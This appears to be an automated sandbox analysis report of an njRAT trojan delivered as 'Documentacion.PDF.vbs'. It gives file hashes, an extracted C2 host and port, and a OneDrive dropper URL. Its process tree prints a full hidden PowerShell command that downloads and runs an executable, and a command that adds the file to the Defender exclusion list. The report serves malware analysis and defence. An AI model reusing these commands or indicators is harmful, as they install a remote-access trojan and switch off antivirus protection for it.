Overview

overview

10

Static

static

Documentacion.PDF.vbs

windows7_x64

10

Documentacion.PDF.vbs

windows10_x64

10

Analysis

  • max time kernel
    87s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    15-09-2021 12:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Documentacion.PDF.vbs

  • Size

    162KB

  • MD5

    16dd6afc5e63f4edc4f35fd1176e63bd

  • SHA1

    d64a9461b703119695e76f880832924d487a648a

  • SHA256

    c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994

  • SHA512

    3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3

Score
10/10
njratnyan catsuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

pedrobedoya2021.duckdns.org:1980

Mutex

cf13c225ff474d45b

Attributes
  • reg_key

    cf13c225ff474d45b

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
        "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1780
        • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
          "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
          4⤵
          • Executes dropped EXE
          PID:1092

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    ab6e8af8fbd0d61e80bd247f8a8b824f

    SHA1

    60d994e16c2002f3b7427e2b303bac9fdf3f3a95

    SHA256

    f7601d4e36e78f9f80a07ccf0af0b6b471593b6ec87efe2e87bfd47f919f6bfe

    SHA512

    c2b27342f8ec1c31da8a5eed60b20fccd4db636b23c3f32d72c7992c68473b94fa5b9bb272befce532bce95c1827bbbe6d90659878827ac5c4d2bd159e17e9fe

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    857aff9992a47764185c61da2493c753

    SHA1

    6efa34cd3fdb299fcd940c0719d3a172bac83164

    SHA256

    b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

    SHA512

    fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    857aff9992a47764185c61da2493c753

    SHA1

    6efa34cd3fdb299fcd940c0719d3a172bac83164

    SHA256

    b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

    SHA512

    fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    857aff9992a47764185c61da2493c753

    SHA1

    6efa34cd3fdb299fcd940c0719d3a172bac83164

    SHA256

    b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

    SHA512

    fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

    Download Submit
  • memory/1092-82-0x000000000040677E-mapping.dmp
    Download
  • memory/1092-81-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/1268-67-0x000000001A8A4000-0x000000001A8A6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1268-68-0x0000000001FF0000-0x0000000001FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-69-0x000000001B700000-0x000000001B701000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-70-0x000000001C580000-0x000000001C581000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-66-0x000000001A8A0000-0x000000001A8A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1268-65-0x00000000023E0000-0x00000000023E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-64-0x000000001AB30000-0x000000001AB31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-63-0x0000000001F10000-0x0000000001F11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1268-61-0x0000000000000000-mapping.dmp
    Download
  • memory/1592-71-0x0000000000000000-mapping.dmp
    Download
  • memory/1592-78-0x0000000005F80000-0x0000000005FD4000-memory.dmp
    Filesize

    336KB

    Download
  • memory/1592-79-0x0000000000440000-0x000000000045F000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1592-77-0x00000000002A0000-0x00000000002A7000-memory.dmp
    Filesize

    28KB

    Download
  • memory/1592-76-0x0000000002110000-0x0000000002111000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1592-74-0x00000000002C0000-0x00000000002C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-80-0x0000000000000000-mapping.dmp
    Download
  • memory/1780-94-0x0000000005670000-0x0000000005671000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-85-0x0000000000570000-0x0000000000571000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-86-0x0000000004860000-0x0000000004861000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-87-0x0000000004820000-0x0000000004821000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-88-0x0000000004822000-0x0000000004823000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-89-0x0000000002520000-0x0000000002521000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-90-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-124-0x0000000006310000-0x0000000006311000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-84-0x0000000075801000-0x0000000075803000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1780-99-0x0000000005740000-0x0000000005741000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-100-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-101-0x0000000006160000-0x0000000006161000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-108-0x0000000006240000-0x0000000006241000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-109-0x00000000056B0000-0x00000000056B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1780-123-0x0000000006300000-0x0000000006301000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1816-60-0x000007FEFB631000-0x000007FEFB633000-memory.dmp
    Filesize

    8KB

    Download